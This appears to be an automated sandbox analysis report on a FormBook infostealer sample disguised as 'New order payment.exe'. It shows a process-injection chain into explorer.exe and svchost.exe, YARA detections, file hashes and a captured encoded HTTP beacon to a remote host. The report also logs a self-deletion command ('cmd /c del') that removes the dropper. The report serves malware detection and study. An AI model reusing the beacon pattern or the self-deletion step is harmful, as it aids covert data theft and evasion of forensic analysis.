                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 77 70 6b 52 65 70 6f 72 74 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 70 6c 75 67 69 6e 73 2f 67 6c 6f 62 61 6c 65 72 72 6f 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 70 6c 75 67 69 6e 73 2f 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 77 70 6b 52 65 70 6f 72 74 65 72 26 26 28 77 69 6e 64 6f 77 2e 77 70 6b 3d 6e 65 77 20 77 69 6e 64 6f 77 2e 77 70 6b 52 65 70 6f 72 74 65 72 28 7b 62 69 64 3a 22 62 65 72 67 2d 64 6f 77 6e 6c 6f 61 64 22 2c 72 65 6c 3a 22 32 2e 32 35 2e 31 22 2c 73 61 6d 70 6c 65 52 61 74 65 3a 31 2c 70 6c 75 67 69 6e 73 3a 5b 5b 77 69 6e 64 6f 77 2e 77 70 6b 67 6c 6f 62 61 6c 65 72 72 6f 72 50 6c 75 67 69 6e 2c 7b 6a 73 45 72 72 3a 21 30 2c 6a 73 45 72 72 53 61 6d 70 6c 65 52 61 74 65 3a 31 2c 72 65 73 45 72 72 3a 21 30 2c 72 65 73 45 72 72 53 61 6d 70 6c 65 52 61 74 65 3a 31 7d 5d 2c 5b 77 69 6e 64 6f 77 2e 77 70 6b 70 65 72 66 6f 72 6d 61 6e 63 65 50 6c 75 67 69 6e 2c 7b 65 6e 61 62 6c 65 3a 21 30 2c 73 61 6d 70 6c 65 52 61 74 65 3a 2e 35 7d 5d 5d 7d 29 2c 77 69 6e 64 6f 77 2e 77 70 6b 2e 69 6e 73 74 61 6c 6c 28 29 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 6c 6f 61 64 42 61 69 64 75 48 6d 74 28 74 29 7b 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 e7 99 be e5 ba a6 e7 bb 9f e8 ae a1 22 2c 74 29 3b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 65 2e 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 22 2b 74 3b 76 61 72 20 6f 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 6f 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 65 2c 6f 29 7d 66 75 6e 63 74 69 6f 6e 20 62 61 69 64 75 50 75 73 68 28 74 2c 65 2c 6f 29 7b 77 69 6e 64 6f 77 2e 5f 68 6d 74 2e 70 75 73 68 28 5b 22 5f 74 72 61 63 6b 45 76 65 6e 74 22 2c 74 2c
                                                              Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js" crossorigin="true"></script><script>window.wpkReporter&&(window.wpk=new window.wpkReporter({bid:"berg-download",rel:"2.25.1",sampleRate:1,plugins:[[window.wpkglobalerrorPlugin,{jsErr:!0,jsErrSampleRate:1,resErr:!0,resErrSampleRate:1}],[window.wpkperformancePlugin,{enable:!0,sampleRate:.5}]]}),window.wpk.install())</script><script>function loadBaiduHmt(t){console.log("",t);var e=document.createElement("script");e.src="https://hm.baidu.com/hm.js?"+t;var o=document.getElementsByTagName("script")[0];o.parentNode.insertBefore(e,o)}function baiduPush(t,e,o){window._hmt.push(["_trackEvent",t,


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              6192.168.2.549799160.153.136.380C:\Windows\explorer.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Oct 27, 2021 16:20:59.425259113 CEST9284OUTGET /u9xn/?EvGDLnJ=FQ+FDzcRNFqTHDas5QzX/ZxEACq3iyWpSRLff56TNweY9Uo4XxUeKhcbnwpchSkctfqz&5j=0BKPgh7X4n HTTP/1.1
                                                              Host: www.hanansalman.com
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
                                                              Oct 27, 2021 16:20:59.480664968 CEST9284INHTTP/1.1 400 Bad Request
                                                              Connection: close


                                                              Code Manipulations

                                                              Statistics

                                                              Behavior

                                                              Click to jump to process

                                                              System Behavior

                                                              Analysis Process: New order payment.exe PID: 4912 Parent PID: 6088

                                                              General

                                                              Start time:16:18:59
                                                              Start date:27/10/2021
                                                              Path:C:\Users\user\Desktop\New order payment.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:'C:\Users\user\Desktop\New order payment.exe'
                                                              Imagebase:0x400000
                                                              File size:254147 bytes
                                                              MD5 hash:0C301355B11C3BC570D18B02BB7C99D8
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.247641891.000000000F020000.00000004.00000001.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.247641891.000000000F020000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.247641891.000000000F020000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                              Reputation:low

                                                              Analysis Process: New order payment.exe PID: 2372 Parent PID: 4912

                                                              General

                                                              Start time:16:19:00
                                                              Start date:27/10/2021
                                                              Path:C:\Users\user\Desktop\New order payment.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:'C:\Users\user\Desktop\New order payment.exe'
                                                              Imagebase:0x400000
                                                              File size:254147 bytes
                                                              MD5 hash:0C301355B11C3BC570D18B02BB7C99D8
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.242280260.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.242280260.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.242280260.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.299937698.00000000008B0000.00000040.00020000.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.299937698.00000000008B0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.299937698.00000000008B0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.243344701.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.243344701.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.243344701.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.243811389.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.243811389.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.243811389.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.299764857.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.299764857.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.299764857.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.299991453.0000000000910000.00000040.00020000.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.299991453.0000000000910000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.299991453.0000000000910000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              Reputation:low

                                                              Analysis Process: explorer.exe PID: 3472 Parent PID: 2372

                                                              General

                                                              Start time:16:19:05
                                                              Start date:27/10/2021
                                                              Path:C:\Windows\explorer.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\Explorer.EXE
                                                              Imagebase:0x7ff693d90000
                                                              File size:3933184 bytes
                                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.276617394.000000000FA2C000.00000040.00020000.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.276617394.000000000FA2C000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.276617394.000000000FA2C000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.289468709.000000000FA2C000.00000040.00020000.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.289468709.000000000FA2C000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.289468709.000000000FA2C000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              Reputation:high

                                                              Analysis Process: svchost.exe PID: 2600 Parent PID: 3472

                                                              General

                                                              Start time:16:19:26
                                                              Start date:27/10/2021
                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Windows\SysWOW64\svchost.exe
                                                              Imagebase:0x9b0000
                                                              File size:44520 bytes
                                                              MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.502244762.0000000002D90000.00000040.00020000.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.502244762.0000000002D90000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.502244762.0000000002D90000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.501581822.0000000000C50000.00000004.00000001.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.501581822.0000000000C50000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.501581822.0000000000C50000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.502016177.0000000002C90000.00000040.00020000.sdmp, Author: Joe Security
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.502016177.0000000002C90000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.502016177.0000000002C90000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                              Reputation:high

                                                              Analysis Process: cmd.exe PID: 6196 Parent PID: 2600

                                                              General

                                                              Start time:16:19:31
                                                              Start date:27/10/2021
                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:/c del 'C:\Users\user\Desktop\New order payment.exe'
                                                              Imagebase:0x150000
                                                              File size:232960 bytes
                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              Analysis Process: conhost.exe PID: 6204 Parent PID: 6196

                                                              General

                                                              Start time:16:19:32
                                                              Start date:27/10/2021
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff7ecfc0000
                                                              File size:625664 bytes
                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              Disassembly

                                                              Code Analysis

                                                              Reset < >